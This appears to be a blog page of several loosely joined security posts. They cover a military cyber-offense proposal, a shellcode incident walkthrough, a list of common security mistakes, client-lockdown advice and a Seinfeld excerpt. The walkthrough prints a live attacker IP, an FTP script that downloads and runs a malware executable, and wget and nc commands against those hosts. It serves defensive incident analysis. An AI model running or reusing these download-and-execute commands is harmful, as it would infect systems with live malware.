“Elite Military Hacker Squad Would Stop Wars With Bits, Not Bombs

Efforts to drag our military’s cybersecurity into the 21st century are well underway, but John Arquilla, professor at the Naval Postgraduate School, wants more: A preemptive international hacker force, which would cripple enemies before they even become a problem. “

How does that sound to you? Science fiction? Not really.

So here goes the thought… they’ll be employing like what, 1000 cyber crooks to fry every other nation’s IT Infrastructure? Just how exactly do you think they are gonna do that, during wartime? Do you think that the attack will begin as soon as the war is declared? Nope, wrong answer.

so when does it begin?

Today. They will need to infiltrate every potentially rival country’s military infrastructure today, starting today and continuing on and on, installing software and hardware “time bombs”, potentially being activated wirelessly via encrypted channels, as that’s the only way to bypass the rival’s communication channels (which might be shut down “preventatively” to prevent enemy attack.. yeah right).

What does it take to infiltrate another country? Just a few clicks, sometimes. Sometimes more, but generally – not.

Think about something.

How many American companies can you name, on which depends all the IT infrastructure of the world? Can they create or show to the NSA or CIA any potential weaknesses (that is, in case they are not there on purpose) in their products, to protect their country? Even if they don’t cooperate, how many ‘rival’ countries out there use american equipment (both software and hardware) for their military systems? That’s like.. what… not logical? For one thing I’m sure – Russia doesn’t. They can afford to use their own software and hardware platforms, at least in the top secret locations. What about smaller countries, like .. Bulgaria, for example (where I currently live)? They use Microsoft products everywhere, from the workstations to the servers… here’s one country that’s crippled even before any “attack” comes our way.

From what I’ve heard, counties such as New Zealand already got ‘bugs’ in their “Secret Services” (is there the possibility I’ve seen them myself? Can’t remember..) IT systems. And it’s not necessary that these bugs are planted by another country – but it’s very likely. How do you make sure your systems are clean? Well… you hire folks like me. Unfortunately, nobody ever hires us, unless they really have to – and it’s probably too late by then. You generally never hear about any intruder in your network, unless the intruders are 1) Really, REALLY stupid, or 2) they are A LOT already, so many you can’t not notice them. Both cases suck, so to speak.

If the US of A and UK have already started hiring “offensive” cyber criminals, it’s time other countries start doing this, or they will be doomed watching their own demise when the day comes to “defend” – that day, they’ll have to defend themselves not from external IT attacks, but from their own already infiltrated IT systems.

The clock is ticking, guys. The clock is ticking.

They have been doing this for the last 3 years – when will you start?

If you want to read the full story – http://news.cnet.com/8301-1009_3-10153795-83.html

What are they gonna do about it now?

http://blog.didierstevens.com/2009/01/17/playing-with-authenticode-and-md5-collisions/

An example:

The obvious question to ask in view of such an attack is “what are they trying to do” and “was it successful”. To help you answering these questions next time you find yourself on the receiving end of something like this, here’s a quick walk-through on how we went about coming up with the answers.

1. Prune the capture to remove the part that is “filler”  (iE all the kkkkllllll in the capture shown)

2. Convert the remaining capture into a binary file.  Here’s how I do it:

cat a.txt | cut -b 11-58 | perl -pe ‘s/(..)\s+/chr(hex($1))/ge’ > a.bin

The “cut” command strips out the address to the left and the printed characters to the right, and only leaves the HEX codes, which then are converted by the perl instruction into single byte characters and written into a file that I called “a.bin”

3.  Next, use the “sctest” tool of libemu to try and make sense of the code block. Libemu doesn’t always work on such code, but IF it works, it is doing such a stellar job that I’m always trying libemu/sctest first before loading the code into Ollydbg or Objdump for manual analysis.  In this case, we’re lucky: sctest makes quick work of the code, and we see that the “connect” function of WinSock is used to establish an outbound TCP connection on port 78.

$sctest -Sgs 10000 < a.bin
success offset = 0×00000031
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(0)
stepcount 8189
[....]
DWORD dwProcessId = 4712;
DWORD dwThreadId = 4714;
};
) =  -1;
int connect (
SOCKET s = 66;
struct sockaddr_in * name = 0x0041714a =>
struct   = {
short sin_family = 2;
unsigned short sin_port = 19968 (port=78);
struct in_addr sin_addr = {
unsigned long s_addr = 118898138 (host=218.61.22.7);
};
char sin_zero = “       “;
};
int namelen = 16;

[...]

4. Let’s connect to the address and port that libemu so nicely revealed … and lookie, we get an FTP script that downloads and starts an EXE from 3322.orrrg (org changed to orrrg to keep you from clicking

$nc 218.61.22.7 78
echo open a528.3322.orrrg>1.txt
echo 2967>>1.txt
echo 2967>>1.txt
echo binary>>1.txt
echo get 2967.exe>>1.txt
echo bye>>1.txt
ftp -s:1.txt
2967.exe
2967.exe
2967.exe
del 1.txt
exit
^C

5. Next, we fetch the malware manually

$wget “ftp://2967:2967@a528.3322.orrrg/2967.exe”
[....]

6. Lastly, we analyze 2967.exe with tools like Virustotal (result) ThreatExpert (result) .

Thus, if this had been directed at a server of yours, you would now check the firewall log (IDS, flow log, etc) for an outbound connection attempt to port 78. If nothing is found, the exploit wasn’t successful. If you see the connection to port 78 and it went through (for example because you allow all ports outbound) the next step is to check for the FTP. If the FTP completed as well, you know it is time to re-build that server.

And yes, adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary that we published in 2007, it is by far not the first time that this domain shows up on our malware radar … and the ThreatExpert report included above contains yet another reason to zap this domain and all its subdomains.

Careful: All the badies are still live at this time, shoot your foot at your own risk.

Security Policy and Compliance

• Ignore regulatory compliance requirements.
• Assume the users will read the security policy because you’ve asked them to.
• Use security templates without customizing them.
• Jump into a full-blown adoption of frameworks such as ISO 27001/27002 before you’re ready.
• Create security policies you cannot enforce.
•  Enforce policies that are not properly approved.
•  Blindly follow compliance requirements without creating overall security architecture.
• Create a security policy just to mark a checkbox.
• Pay someone to write your security policy without any knowledge of your business or processes.
• Translate policies in a multi-language environment without consistent meaning across the languages.
• Make sure none of the employees finds the policies.
• Assume that if the policies worked for you last year, they’ll be valid for the next year.
• Assume that being compliant means you’re secure.
• Assume that policies don’t apply to executives.
• Hide from the auditors.

Security Tools

• Deploy a security product out of the box without tuning it.
• Tune the IDS to be too noisy, or too quiet.
• Buy security products without considering the maintenance and implementation costs.
• Rely on anti-virus and firewall products without having additional controls.
• Run regular vulnerability scans, but don’t follow through on the results.
• Let your anti-virus, IDS, and other security tools run on “auto-pilot.”
• Employ multiple security technologies without understanding how each of them contributes.
• Focus on widgets, while omitting to consider the importance of maintaining accountability.
• Buy expensive product when a simple and cheap fix may address 80% of the problem.

Risk Management

• Attempt to apply the same security rigor to all IT assets, regardless of their risk profiles.
• Make someone responsible for managing risk, but don’t give the person any power to make decisions.
• Ignore the big picture while focusing on quantitative risk analysis.
• Assume you don’t have to worry about security, because your company is too small or insignificant.
• Assume you’re secure because you haven’t been compromised recently.
• Be paranoid without considering the value of the asset or its exposure factor.
• Classify all data assets as “top secret.”

Security Practices

• Don’t review system, application, and security logs.
• Expect end-users to forgo convenience in place of security.
• Lock down the infrastructure so tightly, that getting work done becomes very difficult.
• Say “no” whenever asked to approve a request.
• Impose security requirements without providing the necessary tools and training.
• Focus on preventative mechanisms while ignoring detective controls.
• Have no DMZ for Internet-accessible servers.
• Assume your patch management process is working, without checking on it.
• Delete logs because they get too big to read.
• Expect SSL to address all security problems with your web application.
• Ban the use of external USB drives while not restricting outbound access to the Internet.
• Act superior to your counterparts on the network, system admin, and development teams.
• Stop learning about technologies and attacks.
• Adopt hot new IT or security technologies before they have had a chance to mature.
•  Hire somebody just because he or she has a lot of certifications.
• Don’t appraise your manager of the security problems your efforts have avoided.
• Don’t cross-train the IT and security staff.

Password Management

• Require your users to change passwords too frequently.
• Expect your users to remember passwords without writing them down.
• Impose overly-onerous password selection requirements.
• Use the same password on systems that differ in risk exposure or data criticality.
• Impose password requirements without considering the ease with which a password could be reset.

The above list of common security mistakes and misconceptions incorporates contributions from fellow ISC handlers. (Thanks!)

– Lenny

Lenny Zeltser
Security Consulting – Savvis, Inc.

However, it is not at all important.

When somebody attacks you, they will attack your infrastructure, not the one at the datacenter. People bend much easier than equipment, and are much more succeptible to defeat. In fact, who will spend the time in breaking through tens of firewalls and protections at the datacenter, when they could bypass a single (or dual) firewall and get straight into the heart of your company?

New strategy. Before protecting your firewall, your DMZ (I already said in a previous post, that DMZ is useless) – protect your client computers. Yes, build your network with firewalls first, dmz second, internal network and finally client computers – but start protecting your network in depth *from* the client computers, outwards. If your accountant uses Excel, Word and Powerpoint in their work, do not allow them to run Firefox or Skype! Do not give them higher than Guest permissions on their computer! They want to install the latest screensaver? Fine, let them do it at home. No playtime at the company computer network.

Your system administrators, of course, need to work as administrators of their own computers. WRONG! Guest, and Run As when needed.

The CEO needs full access to his computer, of course! … ? – NO! Guest permissions. Unless he signs a document that he is ready to take responsibility for leaking confidential information from his computer, to the internet.

Think about it, and the logic will become clear. Leave one link weak, leave microscopic opening in your security – it *will* be used against you, sooner or later. Make sure you’re not responsible for it, do your job and secure as good as you can.

The user. It’s always the user. I’d rather have a smart user running as administrator on a Windows computer with no firewall, no anti-virus, and no anti-spyware than a dumb user running as limited user on a Ubuntu computer with a firewall, anti-virus, and a rootkit detector. Dumb users click on anything, somehow manage to install untrustworthy software even without administrative privileges, and use easy-to-guess passwords.

As an illustration, take a look at this excerpt from the Seinfeld episode “The Robbery,” in which Jerry buys a secure “operating system,” and Kramer plays the “dumb user.”

ELAINE: [from the bathroom] JERRY! [enters the living-room] Jerry, oh, hi, welcome back. How were the shows?

JERRY: Great, I had fun, where’s the TV, where’s the VCR. [Elaine looks guilty] What?

ELAINE: They were stolen.

JERRY: Stolen? When?

ELAINE: A couple a hours ago, the police are coming right over.

JERRY: Stolen?

ELAINE: [Kramer enters the apartment] Someone left the door open. [it's clear that she means Kramer; she walks to the bathroom]

JERRY: [to Kramer] You left the door open?!

KRAMER: Uh, Jer, well ya know, I was cookin’ and I, I uh, I came in to get this spatula…and I left the door open, ’cause I was gonna bring the spatula right back!

JERRY: Wait, you left the lock open or the door open?

KRAMER: [bobs his head guiltily] The door.

JERRY: The door? You left the door open?

KRAMER: Yeah, well, I was gonna bring the spatula right back.

JERRY: Yeah, and?

KRAMER: Well, I got caught up… watching a soap opera…[with a broken voice] The Bold and the Beautiful

JERRY: So the door was wide open?

KRAMER: Wide open!

JERRY: [Elaine enters the living-room] And where were you?

ELAINE: I was at Bloomingdale’s…waiting for the shower to heat up.

KRAMER: Look, Jerry, I’m sorry, I’m uh, you have insurance, right buddy?

JERRY: No.

KRAMER: [looks shocked] How can you not have insurance?

JERRY: Because…I spent my money on the Clapgo D. 29, it’s the most impenetrable lock on the market today…it has only one design flaw: the door…[shuts the door] must be CLOSED